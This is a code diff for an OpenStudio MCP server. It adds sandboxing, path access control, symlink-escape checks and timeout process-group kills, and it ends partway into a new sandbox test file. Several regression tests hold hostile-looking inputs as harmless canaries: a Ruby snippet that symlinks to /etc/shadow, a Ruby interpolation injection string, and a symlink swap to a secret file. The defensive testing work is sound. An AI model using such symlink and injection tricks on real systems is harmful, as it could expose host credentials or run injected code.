+        tmp_dir = Path(tempfile.mkdtemp(prefix="osmcp_mtest_"))
+        try:
+            env = sandbox.build_env(mdir)          # HOME=mdir (granted rw)
+            env["TMPDIR"] = str(tmp_dir)           # off the bind mount, Landlock-granted below
+            sandbox.prepare_workdir(mdir)
+            sandbox.prepare_workdir(tmp_dir)
             proc = subprocess.run(
-                ["ruby", "-I", ".", str(test_files[0])],
+                sandbox.wrap_cmd(test_cmd, mdir, extra_rw=(str(tmp_dir),)),
                 cwd=str(mdir),
+                env=env,
                 capture_output=True, text=True, timeout=60, check=False,
             )
+        finally:
+            shutil.rmtree(tmp_dir, ignore_errors=True)
 
         output = proc.stdout + proc.stderr
         passed = failed = errors = 0
@@ -1064,20 +1185,32 @@ def test_measure_op(
 
         # Update measure.xml checksums — test_model.osm was added to tests/,
         # and any new files must be registered for OS App Measure Manager.
-        _update_measure_xml(mdir, language)
-
-        return {
+        # Best-effort here: the (confined) test already ran and its pass/fail is
+        # the contract. A metadata-refresh failure (measure -u nonzero, or a
+        # rejected oversize/symlink output) is surfaced as a warning, NOT a test
+        # failure — confinement, not this call's exit code, is the security
+        # boundary, so a passing test must not be masked. (create/edit keep the
+        # raise: there the regenerated measure.xml IS the product.)
+        result = {
             "ok": proc.returncode == 0,
             "passed": passed,
             "failed": failed,
             "errors": errors,
             "test_output": display,
         }
+        try:
+            _update_measure_xml(mdir, language)
+        except RuntimeError as e:
+            result["metadata_warning"] = str(e)
+        return result
 
     except subprocess.TimeoutExpired:
         return {"ok": False, "error": "Test run timed out (60s)"}
     except Exception as e:
         return {"ok": False, "error": f"Failed to test measure: {e}"}
+    finally:
+        if _private_copy is not None:
+            shutil.rmtree(_private_copy, ignore_errors=True)
 
 
 def edit_measure_op(
diff --git a/mcp_server/skills/measures/operations.py b/mcp_server/skills/measures/operations.py
index f6b7438..73a4e41 100644
--- a/mcp_server/skills/measures/operations.py
+++ b/mcp_server/skills/measures/operations.py
@@ -16,10 +16,16 @@
 
 import openstudio
 
-from mcp_server.config import OSCLI_GEM_PATH, OSCLI_GEMFILE, user_run_root
+from mcp_server import sandbox
+from mcp_server.config import (
+    OSCLI_GEM_PATH,
+    OSCLI_GEMFILE,
+    is_path_allowed,
+    user_run_root,
+)
 from mcp_server.model_manager import get_model, load_model
 from mcp_server.skills.measures.osw_weather import resolve_osw_weather
-from mcp_server.util import resolve_run_dir
+from mcp_server.util import reject_escaping_symlinks, resolve_run_dir
 
 
 def list_measure_arguments(measure_dir: str) -> dict[str, Any]:
@@ -142,6 +148,19 @@ def apply_measure(
         measure_path = Path(measure_dir)
         if not measure_path.is_dir():
             return {"ok": False, "error": f"Measure directory not found: {measure_dir}"}
+        # Access control: only run measures from allowed roots (own run area or a
+        # shared read root — repo, inputs, bundled measures). Refuses arbitrary
+        # filesystem paths / another user's area before any copy or execution.
+        if not is_path_allowed(measure_path):
+            return {"ok": False, "error": f"Measure directory not allowed: {measure_dir}"}
+
+        # Reject symlinks that escape the measure dir: copytree(symlinks=True)
+        # below preserves links instead of inlining target content, but a link
+        # pointing outside the measure root (e.g. -> /etc/shadow) must not be
+        # staged at all (it would leak host files into the readable run dir).
+        err = reject_escaping_symlinks(measure_path)
+        if err:
+            return {"ok": False, "error": err}
 
         # Check measure script exists (Ruby or Python)
         has_rb = (measure_path / "measure.rb").is_file()
@@ -163,7 +182,9 @@ def apply_measure(
         measures_dir = run_dir / "measures"
         measures_dir.mkdir(exist_ok=True)
         local_measure = measures_dir / measure_path.name
-        shutil.copytree(str(measure_path), str(local_measure), dirs_exist_ok=True)
+        # symlinks=True: copy links AS links (don't follow → no host-file content
+        # inlined into the run dir); escaping links already rejected above.
+        shutil.copytree(str(measure_path), str(local_measure), dirs_exist_ok=True, symlinks=True)
 
         # Build measure step arguments
         measure_args = {}
@@ -244,13 +265,18 @@ def apply_measure(
                     "--bundle_without", "native_ext"]
         cmd += ["run", run_flag, "-w", str(osw_path)]
         log_path = run_dir / "openstudio.log"
+        # Build env first (it creates run_dir/tmp for TMPDIR as root), THEN hand
+        # the whole run dir — tmp included — to the sandbox uid, so the dropped
+        # process can write its temp/output. Order matters.
+        run_env = sandbox.build_env(run_dir)
+        sandbox.prepare_workdir(run_dir)
         with open(log_path, "w", encoding="utf-8") as log_f:
             proc = subprocess.run(
-                cmd,
+                sandbox.wrap_cmd(cmd, run_dir),
                 cwd=str(run_dir),
                 stdout=log_f,
                 stderr=subprocess.STDOUT,
-                env=os.environ.copy(),
+                env=run_env,
                 timeout=300,  # 5 minute timeout
                 check=False,
             )
diff --git a/mcp_server/skills/simulation/operations.py b/mcp_server/skills/simulation/operations.py
index 4ec5114..d8b537f 100644
--- a/mcp_server/skills/simulation/operations.py
+++ b/mcp_server/skills/simulation/operations.py
@@ -5,6 +5,7 @@
 import json
 import os
 import shutil
+import signal
 import subprocess
 import tempfile
 import threading
@@ -17,6 +18,7 @@
 
 import psutil
 
+from mcp_server import sandbox
 from mcp_server.audit import audit
 from mcp_server.config import (
     LOG_TAIL_DEFAULT,
@@ -24,10 +26,12 @@
     MAX_CONCURRENCY_PER_USER,
     OSCLI_GEM_PATH,
     OSCLI_GEMFILE,
+    SIM_TIMEOUT_SECONDS,
+    is_path_allowed,
     user_run_root,
 )
 from mcp_server.identity import user_key
-from mcp_server.util import resolve_run_dir
+from mcp_server.util import reject_escaping_symlinks, resolve_run_dir
 
 # Where the MCP server stores runs inside the container
 DEFAULT_LOG_TAIL = LOG_TAIL_DEFAULT
@@ -251,6 +255,37 @@ def _pid_alive(pid: int) -> bool:
         return False
 
 
+def _kill_process_group(pid: int, *, grace: float = 5.0) -> None:
+    """Terminate the run's whole process group (SIGTERM, then SIGKILL after grace).
+
+    Sims launch with start_new_session=True, so the child is its own group leader
+    (pgid == pid); killing the group reaps forked children (EnergyPlus, ruby
+    helpers) that a single-pid kill would orphan. We only signal a group we created
+    (pgid == pid) — never the server's own group. Falls back to a single-pid kill
+    when the group can't be resolved or on non-POSIX (no os.killpg).
+    """
+    pgid = None
+    if hasattr(os, "getpgid") and hasattr(os, "killpg"):
+        with contextlib.suppress(ProcessLookupError, PermissionError, OSError):
+            pgid = os.getpgid(pid)
+    if pgid is not None and pgid == pid:
+        with contextlib.suppress(ProcessLookupError, PermissionError, OSError):
+            os.killpg(pgid, signal.SIGTERM)
+        with contextlib.suppress(psutil.NoSuchProcess, psutil.TimeoutExpired):
+            psutil.Process(pid).wait(timeout=grace)
+        with contextlib.suppress(ProcessLookupError, PermissionError, OSError):
+            os.killpg(pgid, signal.SIGKILL)  # ESRCH if the group already exited
+        return
+    # Fallback: pgid unavailable / not a leader / non-POSIX — single-pid kill.
+    with contextlib.suppress(psutil.NoSuchProcess, Exception):
+        p = psutil.Process(pid)
+        p.terminate()
+        try:
+            p.wait(timeout=grace)
+        except psutil.TimeoutExpired:
+            p.kill()
+
+
 def _build_run_cmd(osw_path: Path) -> list[str]:
     """openstudio CLI command to run a staged OSW (with bundle flags)."""
     return [
@@ -265,12 +300,21 @@ def _build_run_cmd(osw_path: Path) -> list[str]:
 def _launch(rec: RunRecord) -> None:
     """Start the EnergyPlus subprocess for a queued run. Caller holds _sim_lock."""
     log = rec.run_dir / "openstudio.log"
+    # build_env creates run_dir/tmp (TMPDIR) as root; chown after so the dropped
+    # process owns it (order matters — see apply_measure).
+    run_env = sandbox.build_env(rec.run_dir)
+    sandbox.prepare_workdir(rec.run_dir)
     proc = subprocess.Popen(  # noqa: S603 - cmd built from trusted config + staged OSW path
-        _build_run_cmd(rec.osw_path),
+        sandbox.wrap_cmd(_build_run_cmd(rec.osw_path), rec.run_dir),
         cwd=str(rec.run_dir),
         stdout=log.open("w", encoding="utf-8"),
         stderr=subprocess.STDOUT,
-        env=os.environ.copy(),
+        env=run_env,
+        # New session => the child is its own process-group leader (pgid == pid),
+        # so a timeout/cancel can kill the WHOLE group (EnergyPlus + any forked
+        # helpers) without ever signalling the server's own group. See
+        # _kill_process_group(). No-op on non-POSIX.
+        start_new_session=True,
     )
     rec.pid = proc.pid
     rec.status = "running"
@@ -318,8 +362,44 @@ def _dispatch_once() -> None:
                 _queue.remove(run_id)
 
 
+def _enforce_timeouts() -> None:
+    """Terminate running sims past the wall-clock cap and mark them failed.
+
+    OSMCP_SIM_TIMEOUT_SECONDS=0 disables. The kill (terminate -> wait -> kill)
+    runs outside _sim_lock so a slow exit can't stall the dispatcher.
+    """
+    if SIM_TIMEOUT_SECONDS <= 0:
+        return
+    now = _now()
+    with _sim_lock:
+        expired = [
+            rec for rec in _RUNS.values()
+            if rec.status == "running" and rec.pid is not None
+            and rec.started_at is not None
+            and now - rec.started_at > SIM_TIMEOUT_SECONDS
+            # Skip a process that already exited but hasn't been reaped yet: let
+            # _dispatch_once()/_refresh_status() classify it by its real exit code
+            # instead of force-failing a run that may have completed successfully.
+            and _pid_alive(rec.pid)
+        ]
+    for rec in expired:
+        _kill_process_group(rec.pid)  # whole group: EnergyPlus + any forked helpers
+        with _sim_lock:
+            rec.status = "failed"
+            rec.ended_at = _now()
+            rec.exit_code = -1 if rec.exit_code is None else rec.exit_code
+            rec.error = (f"Simulation exceeded the {SIM_TIMEOUT_SECONDS:.0f}s wall-clock "
+                         "cap (OSMCP_SIM_TIMEOUT_SECONDS)")
+            _RUNS[rec.run_id] = rec
+        _persist_run_record(rec)
+        audit("sim_timeout", run_id=rec.run_id, user=rec.user_key,
+              ran_seconds=round(now - (rec.started_at or now), 1))
+
+
 def _dispatch_loop() -> None:
     while True:
+        with contextlib.suppress(Exception):
+            _enforce_timeouts()
         with contextlib.suppress(Exception):
             _dispatch_once()
         time.sleep(0.5)
@@ -340,7 +420,8 @@ def _enqueue(run_id: str) -> None:
         _queue.append(run_id)
 
 
-def run_osw(osw_path: str, epw_path: str | None = None, name: str | None = None) -> dict[str, Any]:
+def run_osw(osw_path: str, epw_path: str | None = None, name: str | None = None,
+            *, _internal: bool = False) -> dict[str, Any]:
     """
     Stage the OSW + referenced files into /runs/<run_id>/ and execute:
       openstudio run -w <staged_osw>
@@ -349,10 +430,28 @@ def run_osw(osw_path: str, epw_path: str | None = None, name: str | None = None)
       - We always validate the OSW JSON and its seed_file reference (if any).
       - If no EPW override is provided, we also require the OSW's weather_file (if set) to exist.
       - If an EPW override is provided, we allow a missing OSW weather_file because it will be replaced.
+
+    Access control: as a PUBLIC tool, run_osw copies the OSW's whole parent dir into
+    the run dir — so an un-gated path discloses arbitrary host / other-tenant files.
+    Public callers must pass an OSW (and EPW) under their own run root or a shared
+    read root (is_path_allowed). `_internal=True` is the trusted path for
+    run_simulation, whose server-built temp OSW lives in a private staging dir and
+    whose inputs it has already validated; it is NOT exposed via the MCP tool.
     """
     src_osw = Path(osw_path).resolve()
     if not src_osw.exists():
         return {"ok": False, "error": f"OSW not found: {osw_path}"}
+    if not _internal:
+        # Gate BEFORE reading/validating/copying anything from the path.
+        if not is_path_allowed(src_osw):
+            return {"ok": False, "error": f"OSW path not allowed: {osw_path}"}
+        if epw_path and not is_path_allowed(Path(epw_path)):
+            return {"ok": False, "error": f"EPW path not allowed: {epw_path}"}
+    # We must never FOLLOW a symlink in the OSW's tree that escapes the bundle
+    # (would copy a host file into the run dir), even for the trusted internal path.
+    sym_err = reject_escaping_symlinks(src_osw.parent)
+    if sym_err:
+        return {"ok": False, "error": sym_err}
 
     # Fail fast on invalid OSW (before staging any run dir)
     v = validate_osw(str(src_osw), epw_path=epw_path)
@@ -644,13 +743,15 @@ def cancel_run(run_id: str) -> dict[str, Any]:
         audit("sim_cancelled", run_id=run_id, user=rec.user_key)
         return {"ok": True, "run_id": run_id, "cancelled": True}
 
+    if not _pid_alive(pid):
+        # Finished before the cancel landed — classify by exit code, don't mislabel
+        # a completed run as cancelled.
+        with _sim_lock:
+            rec = _refresh_status(rec)
+            _RUNS[run_id] = rec
+        return {"ok": True, "run_id": run_id, "cancelled": False, "status": rec.status}
     try:
-        p = psutil.Process(pid)
-        p.terminate()
-        try:
-            p.wait(timeout=5)
-        except psutil.TimeoutExpired:
-            p.kill()
+        _kill_process_group(pid)  # whole group (EnergyPlus + helpers), not just the leader
         with _sim_lock:
             rec.status = "cancelled"
             rec.ended_at = rec.ended_at or _now()
@@ -658,11 +759,6 @@ def cancel_run(run_id: str) -> dict[str, Any]:
         _persist_run_record(rec)  # disk record must read 'cancelled' so GC can reclaim it
         audit("sim_cancelled", run_id=run_id, user=rec.user_key)
         return {"ok": True, "run_id": run_id, "cancelled": True}
-    except psutil.NoSuchProcess:
-        with _sim_lock:
-            rec = _refresh_status(rec)
-            _RUNS[run_id] = rec
-        return {"ok": True, "run_id": run_id, "cancelled": False, "status": rec.status}
     except Exception as e:
         return {"ok": False, "run_id": run_id, "error": str(e)}
 
@@ -744,6 +840,8 @@ def run_simulation(osm_path: str, epw_path: str | None = None, name: str | None
     osm = Path(osm_path)
     if not osm.exists():
         return {"ok": False, "error": f"OSM file not found: {osm_path}"}
+    if not is_path_allowed(osm):
+        return {"ok": False, "error": f"OSM path not allowed: {osm_path}"}
 
     # Validate EPW path upfront if provided
     epw_abs: str | None = None
@@ -751,6 +849,8 @@ def run_simulation(osm_path: str, epw_path: str | None = None, name: str | None
         epw = Path(epw_path)
         if not epw.exists():
             return {"ok": False, "error": f"EPW file not found: {epw_path}"}
+        if not is_path_allowed(epw):
+            return {"ok": False, "error": f"EPW path not allowed: {epw_path}"}
         epw_abs = str(epw.resolve())
 
     # Stage the minimal OSW in a throwaway temp dir. run_osw() copies the staged
@@ -770,5 +870,7 @@ def run_simulation(osm_path: str, epw_path: str | None = None, name: str | None
         osw_path_out = stage / "workflow.osw"
         osw_path_out.write_text(json.dumps(osw, indent=2), encoding="utf-8")
 
-        # Delegate to run_osw — pass epw_path so it handles staging into files/
-        return run_osw(osw_path=str(osw_path_out), epw_path=epw_abs, name=name)
\ No newline at end of file
+        # Delegate to run_osw — pass epw_path so it handles staging into files/.
+        # _internal=True: osm + epw are already is_path_allowed above and the temp
+        # OSW is server-built in a private staging dir (not a caller-supplied path).
+        return run_osw(osw_path=str(osw_path_out), epw_path=epw_abs, name=name, _internal=True)
\ No newline at end of file
diff --git a/mcp_server/util.py b/mcp_server/util.py
index 75ef54c..bbe9308 100644
--- a/mcp_server/util.py
+++ b/mcp_server/util.py
@@ -1,10 +1,82 @@
 from __future__ import annotations
 
 import json
+import os
 import shutil
+import stat
 from pathlib import Path
 
 
+def reject_escaping_symlinks(root: Path) -> str | None:
+    """Return an error string if the directory tree `root` contains a symlink
+    whose target resolves OUTSIDE `root`; else None.
+
+    Used before staging untrusted measure/OSW trees: a link to a host file
+    (e.g. -> /etc/shadow) must not be copied or executed. Internal symlinks are
+    allowed. Does not follow symlinked directories (no traversal / loops).
+    """
+    try:
+        rroot = str(root.resolve())
+    except OSError:
+        return f"Cannot resolve path: {root}"
+    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
+        for name in dirnames + filenames:
+            p = Path(dirpath) / name
+            if not p.is_symlink():
+                continue
+            try:
+                target = str(p.resolve())
+            except OSError:
+                return f"Broken symlink in staged tree: {name}"
+            if target != rroot and not target.startswith(rroot + os.sep):
+                return f"Symlink escapes the allowed directory (not allowed): {name}"
+    return None
+
+
+def read_file_bounded(path: Path, max_bytes: int) -> bytes:
+    """Read a regular file WITHOUT following a final-component symlink, capping
+    the read at ``max_bytes``.
+
+    Hardening for copying back files produced by confined-but-untrusted code
+    (e.g. ``openstudio measure -u`` regenerating ``measure.xml`` in a staged
+    dir):
+      * O_NOFOLLOW (where available) closes the symlink-swap TOCTOU — a measure
+        that replaces the output with a link to e.g. /etc/shadow cannot redirect
+        the read to the link target.
+      * the read stops at ``max_bytes + 1``, so an oversized output cannot be
+        slurped wholesale into memory before being rejected.
+
+    Raises ``ValueError`` on a symlink, a non-regular file (dir/fifo/device), an
+    oversize file, or an unreadable path. On platforms without O_NOFOLLOW the
+    symlink guard degrades to the caller's own is_symlink() check (the sandbox
+    targets Linux).
+    """
+    flags = (os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0)
+             | getattr(os, "O_NONBLOCK", 0) | getattr(os, "O_BINARY", 0))
+    try:
+        fd = os.open(path, flags)
+    except OSError as e:
+        # ELOOP => final component is a symlink (O_NOFOLLOW); surface clearly.
+        raise ValueError(f"cannot read {path} (symlink or unreadable): {e}") from e
+    try:
+        if not stat.S_ISREG(os.fstat(fd).st_mode):
+            raise ValueError(f"not a regular file: {path}")
+        chunks: list[bytes] = []
+        remaining = max_bytes + 1
+        while remaining > 0:
+            chunk = os.read(fd, remaining)
+            if not chunk:
+                break
+            chunks.append(chunk)
+            remaining -= len(chunk)
+        data = b"".join(chunks)
+        if len(data) > max_bytes:
+            raise ValueError(f"file exceeds {max_bytes} bytes: {path}")
+        return data
+    finally:
+        os.close(fd)
+
+
 def safe_read_text(path: Path, max_bytes: int = 200_000) -> str:
     data = safe_read_bytes(path, max_bytes=max_bytes)
     return data.decode("utf-8", errors="replace")
diff --git a/tests/test_measure_authoring.py b/tests/test_measure_authoring.py
index b2606f7..70580bf 100644
--- a/tests/test_measure_authoring.py
+++ b/tests/test_measure_authoring.py
@@ -4,6 +4,7 @@
 """
 import asyncio
 import uuid
+from pathlib import Path
 
 import pytest
 from conftest import integration_enabled, server_params, setup_example, unwrap
@@ -203,6 +204,59 @@ async def _run():
     asyncio.run(_run())
 
 
+@pytest.mark.integration
+def test_xml_refresh_failure_preserves_passing_test_results():
+    # Regression: a post-test metadata-refresh failure must NOT mask a passing
+    # (confined) test. The test drops an escaping symlink while confined; the
+    # post-test reject_escaping_symlinks guard then makes _update_measure_xml
+    # raise. Before this fix that raise propagated and test_measure returned
+    # ok:False, dropping passed/failed. Confinement — not the refresh's success —
+    # is the security boundary.
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+
+    async def _run():
+        async with stdio_client(server_params()) as (r, w):
+            async with ClientSession(r, w) as s:
+                await s.initialize()
+                create = unwrap(await s.call_tool("create_measure", {
+                    "name": _unique("xml_refresh_warn"),
+                    "description": "metadata refresh warning probe",
+                    "run_body": '    runner.registerInfo("ok")',
+                    "language": "Ruby",
+                }))
+                assert create["ok"] is True, create
+                measure_dir = Path(create["measure_dir"])
+                # Replace the generated test with a PASSING one that, while running
+                # confined, plants an escaping symlink in the measure dir. The
+                # post-test reject_escaping_symlinks guard trips _update_measure_xml
+                # — deterministic, unlike `measure -u`'s (very tolerant) exit code.
+                test_files = sorted((measure_dir / "tests").glob("*_test.rb"))
+                assert len(test_files) == 1, test_files
+                test_files[0].write_text(
+                    "require 'minitest/autorun'\n"
+                    "class EscapeLinkTest < Minitest::Test\n"
+                    "  def test_drop_escaping_symlink\n"
+                    "    File.symlink('/etc/shadow', 'evil_escape_link') "
+                    "unless File.symlink?('evil_escape_link')\n"
+                    "    assert(File.symlink?('evil_escape_link'))\n"
+                    "  end\n"
+                    "end\n",
+                    encoding="utf-8",
+                )
+                return unwrap(await s.call_tool("test_measure", {
+                    "measure_dir": str(measure_dir),
+                }))
+
+    res = asyncio.run(_run())
+    assert res["ok"] is True, f"passing test masked by xml-refresh failure: {res}"
+    assert res["passed"] > 0, res
+    assert "metadata_warning" in res, (
+        f"expected non-fatal metadata_warning when refresh fails, got: {res}"
+    )
+    assert "escape" in res["metadata_warning"].lower(), res["metadata_warning"]
+
+
 @pytest.mark.integration
 def test_test_measure_python_passes():
     """Create a simple Python measure, run its tests."""
@@ -1148,3 +1202,58 @@ async def _run():
                 # Should still include measure_dir for debugging
                 assert "measure_dir" in res
     asyncio.run(_run())
+
+
+@pytest.mark.integration
+def test_ruby_description_interpolation_neutralized():
+    # Regression: a measure description was emitted into a Ruby double-quoted
+    # literal WITHOUT escaping '#', so '#{...}' was live interpolation. When
+    # `openstudio measure -u` (run unsandboxed, as root) evaluated description(),
+    # the payload executed = RCE. _escape_ruby_str must escape '#' -> '\#'.
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+    from pathlib import Path
+
+    payload = "harmless pwn#{2+2} tail"
+
+    async def _run():
+        async with stdio_client(server_params()) as (r, w):
+            async with ClientSession(r, w) as s:
+                await s.initialize()
+                name = _unique("rb_inject")
+                res = unwrap(await s.call_tool("create_measure", {
+                    "name": name,
+                    "description": payload,
+                    "run_body": RUBY_BODY,
+                    "language": "Ruby",
+                }))
+                assert res["ok"] is True, res
+                rb = Path(res["measure_dir"], "measure.rb").read_text(encoding="utf-8")
+                # The escaped form must be present and the live-interpolation form absent.
+                assert "pwn\\#{2+2}" in rb, f"description '#' not escaped:\n{rb}"
+                assert "pwn#{2+2}" not in rb, f"live Ruby interpolation survived:\n{rb}"
+    asyncio.run(_run())
+
+
+@pytest.mark.integration
+def test_uppercase_arg_name_rejected():
+    # Regression: an uppercase-leading arg name became a bare Ruby local `Foo = ...`,
+    # which Ruby parses as dynamic constant assignment (SyntaxError) inside a method,
+    # breaking the generated measure. _ARG_NAME_RE must reject uppercase-leading names.
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+
+    async def _run():
+        async with stdio_client(server_params()) as (r, w):
+            async with ClientSession(r, w) as s:
+                await s.initialize()
+                res = unwrap(await s.call_tool("create_measure", {
+                    "name": _unique("up_arg"),
+                    "description": "uppercase arg name",
+                    "run_body": RUBY_BODY,
+                    "language": "Ruby",
+                    "arguments": [{"name": "BadName", "type": "String", "required": False}],
+                }))
+                assert res["ok"] is False, f"uppercase arg name must be rejected: {res}"
+                assert "argument name" in res.get("error", "").lower(), res
+    asyncio.run(_run())
diff --git a/tests/test_path_safety.py b/tests/test_path_safety.py
index 32d6d2a..71cd926 100644
--- a/tests/test_path_safety.py
+++ b/tests/test_path_safety.py
@@ -5,12 +5,99 @@
 from __future__ import annotations
 
 import json
+import os
 import subprocess as _subprocess
 
 import pytest
 
+from mcp_server.util import read_file_bounded
+
 pytestmark = pytest.mark.unit
 
+
+class TestReadFileBounded:
+    """read_file_bounded — bounded, symlink-refusing copy-back read used after
+    confined `openstudio measure -u` regenerates measure.xml/README.md."""
+
+    def test_reads_within_bound(self, tmp_path):
+        # Validates: a normal generated file is returned verbatim.
+        f = tmp_path / "measure.xml"
+        f.write_bytes(b"<measure/>" * 5)
+        assert read_file_bounded(f, 1000) == b"<measure/>" * 5
+
+    def test_rejects_oversize(self, tmp_path):
+        # Regression: untrusted measure -u could write a giant measure.xml; the
+        # read is bounded (max_bytes+1) so it can't be slurped wholesale into
+        # the unconfined server's memory (Copilot C1).
+        f = tmp_path / "big.xml"
+        f.write_bytes(b"A" * 200)
+        with pytest.raises(ValueError, match="exceeds"):
+            read_file_bounded(f, 100)
+
+    @pytest.mark.skipif(not hasattr(os, "O_NOFOLLOW"), reason="O_NOFOLLOW is POSIX-only")
+    def test_refuses_to_follow_symlink(self, tmp_path):
+        # Regression: measure -u (untrusted) could swap the output for a symlink
+        # to a host secret; O_NOFOLLOW means copy-back never reads the link
+        # target (TOCTOU). A naive read_bytes() would return the secret here.
+        secret = tmp_path / "secret"
+        secret.write_bytes(b"TOPSECRET")
+        link = tmp_path / "measure.xml"
+        link.symlink_to(secret)
+        with pytest.raises(ValueError, match="symlink"):
+            read_file_bounded(link, 1000)
+
+    @pytest.mark.skipif(not hasattr(os, "O_NONBLOCK"), reason="POSIX fifo test")
+    def test_refuses_non_regular_file(self, tmp_path):
+        # Validates: a fifo/dir masquerading as a generated file is rejected
+        # (not a regular file) instead of blocking or reading junk.
+        d = tmp_path / "README.md"
+        d.mkdir()
+        with pytest.raises(ValueError, match="not a regular file"):
+            read_file_bounded(d, 1000)
+
+
+class TestPerTenantSandboxUid:
+    """Per-tenant sandbox uid derivation (M1/M2). Each remote tenant gets its own
+    uid so RLIMIT_NPROC (per-uid) is a private budget and DAC isolates run dirs
+    even without Landlock; the local single user keeps the baked-in base uid."""
+
+    def test_local_keeps_base_uid(self, monkeypatch):
+        # Validates: stdio/off-request single user keeps the baked sandbox uid —
+        # preserves today's behavior, no per-tenant derivation.
+        import mcp_server.config as cfg
+        monkeypatch.setattr("mcp_server.identity.user_key", lambda: "local")
+        assert cfg.sandbox_ids() == (cfg.SANDBOX_UID, cfg.SANDBOX_GID)
+
+    def test_distinct_uid_per_tenant(self, monkeypatch):
+        # Regression (M1/M2): all tenants shared uid 1001 -> one shared NPROC
+        # budget (cross-tenant fork-bomb DoS) and zero DAC isolation in the posix
+        # tier. Each tenant key must map to its OWN non-root uid.
+        import mcp_server.config as cfg
+        monkeypatch.setattr("mcp_server.identity.user_key", lambda: "alice")
+        a = cfg.sandbox_ids()
+        monkeypatch.setattr("mcp_server.identity.user_key", lambda: "bob")
+        b = cfg.sandbox_ids()
+        assert a != b, "distinct tenants must get distinct sandbox uids"
+        assert a[0] >= 2000 and b[0] >= 2000, "derived uids must be above the system/sandbox range"
+        assert a[0] != cfg.SANDBOX_UID, "a tenant uid must differ from the local base uid"
+        assert a[1] == a[0] and b[1] == b[0], "gid tracks uid"
+
+    def test_uid_stable_for_same_key(self, monkeypatch):
+        # Validates: derivation is stable across calls (hashlib, not randomized
+        # hash()) so a request's chown and setuid agree on the same uid.
+        import mcp_server.config as cfg
+        monkeypatch.setattr("mcp_server.identity.user_key", lambda: "carol")
+        assert cfg.sandbox_ids() == cfg.sandbox_ids()
+
+    def test_sandbox_uid_zero_clamped(self):
+        # Regression (Codex H5): OSMCP_SANDBOX_UID<=0 must clamp to a non-root uid
+        # so the local base uid can never be root (kept as a unit test now that the
+        # HTTP h5 path exercises per-tenant derivation instead of the base uid).
+        import mcp_server.config as cfg
+        assert cfg._safe_sandbox_id("0", 1001) == 1001
+        assert cfg._safe_sandbox_id("-5", 1001) == 1001
+        assert cfg._safe_sandbox_id("4242", 1001) == 4242
+
 # ---------------------------------------------------------------------------
 # C-1: seed_file path traversal guard in run_osw
 # ---------------------------------------------------------------------------
@@ -72,7 +159,7 @@ def kill(self):
 
         monkeypatch.setattr(_subprocess, "Popen", _FakePopen)
 
-        result = run_osw(str(osw_path))
+        result = run_osw(str(osw_path), _internal=True)  # exercise staging/flatten, not the access gate
         # Staging happens before subprocess — verify unconditionally
         assert "escapes" not in result.get("error", ""), f"Path traversal error: {result}"
         run_dirs = list(run_root.iterdir())
@@ -122,7 +209,7 @@ def kill(self):
 
         monkeypatch.setattr(_subprocess, "Popen", _FakePopen)
 
-        result = run_osw(str(osw_path))
+        result = run_osw(str(osw_path), _internal=True)  # exercise staging/flatten, not the access gate
         # Staging happens before subprocess — verify unconditionally
         assert "escapes" not in result.get("error", ""), "Normal seed incorrectly rejected"
         run_dirs = list(run_root.iterdir())
@@ -461,3 +548,60 @@ def test_bad_end_month(self):
         result = set_run_period(begin_month=1, begin_day=1, end_month=13, end_day=31)
         assert result["ok"] is False
         assert "end_month" in result["error"]
+
+
+class TestRunOswAccessControl:
+    """#2 (Codex): the PUBLIC run_osw must reject an OSW outside the caller's
+    allowed roots — it copies the OSW's whole parent dir into the run dir, so an
+    un-gated path is a cross-tenant / host file-disclosure vector."""
+
+    def _stub(self, monkeypatch, run_root):
+        monkeypatch.setattr(
+            "mcp_server.skills.simulation.operations.user_run_root", lambda: run_root)
+        monkeypatch.setattr(
+            "mcp_server.skills.simulation.operations._ensure_dispatcher", lambda: None)
+
+    def test_out_of_policy_osw_rejected(self, tmp_path, monkeypatch):
+        # Regression: run_osw skipped is_path_allowed and _copy_tree'd the OSW's whole
+        # parent dir into the run dir, disclosing arbitrary host / other-tenant files.
+        outside = tmp_path / "other_tenant"
+        outside.mkdir()
+        (outside / "secret.osm").write_text("another tenant's model")
+        (outside / "workflow.osw").write_text(json.dumps({"seed_file": "secret.osm"}))
+        run_root = tmp_path / "runs"
+        run_root.mkdir()
+        self._stub(monkeypatch, run_root)
+
+        from mcp_server.skills.simulation.operations import run_osw
+        result = run_osw(str(outside / "workflow.osw"))  # public call (no _internal)
+        assert result["ok"] is False, f"out-of-policy OSW must be rejected: {result}"
+        assert "not allowed" in result.get("error", "").lower(), result
+        assert list(run_root.iterdir()) == [], "nothing may be staged from a rejected path"
+
+    def test_internal_trusted_path_still_stages(self, tmp_path, monkeypatch):
+        # Validates: the internal staging path (run_simulation's server-built temp OSW)
+        # still works via _internal=True, even from a dir outside the allowed roots.
+        stage = tmp_path / "stage"
+        stage.mkdir()
+        (stage / "model.osm").write_text("seed")
+        (stage / "workflow.osw").write_text(json.dumps({"seed_file": "model.osm"}))
+        run_root = tmp_path / "runs"
+        run_root.mkdir()
+        self._stub(monkeypatch, run_root)
+
+        class _FakePopen:
+            def __init__(self, *a, **kw):
+                self.returncode = 1
+                self.pid = 999
+            def poll(self):
+                return self.returncode
+            def wait(self, timeout=None):
+                return self.returncode
+            def kill(self):
+                pass
+
+        monkeypatch.setattr(_subprocess, "Popen", _FakePopen)
+        from mcp_server.skills.simulation.operations import run_osw
+        result = run_osw(str(stage / "workflow.osw"), _internal=True)
+        assert "not allowed" not in result.get("error", "").lower(), result
+        assert len(list(run_root.iterdir())) == 1, f"internal staging should create a run dir: {result}"
diff --git a/tests/test_sandbox.py b/tests/test_sandbox.py
new file mode 100644
index 0000000..ca24297
--- /dev/null
+++ b/tests/test_sandbox.py
@@ -0,0 +1,975 @@
+"""Confirm the measure-exec vulnerabilities that the sandbox (planned) will close.
+
+Context: docs/plans/measure-exec-sandbox.md. Today an applied measure runs as
+root, with the server's full environment, unconfined filesystem, and open
+network — see skills/measures/operations.py (`env=os.environ.copy()`, no UID
+drop, no FS policy). These tests PROVE each hole exists, safely, using canaries
+and decoys only (no real secret/file/host is touched, nothing leaves the box).
+
+Design — "prove the problem exists now" half of the dual-run plan:
+  - Server is spawned with OSMCP_SANDBOX=off, so these document the explicit
+    passthrough/escape-hatch behaviour and remain valid once the sandbox lands
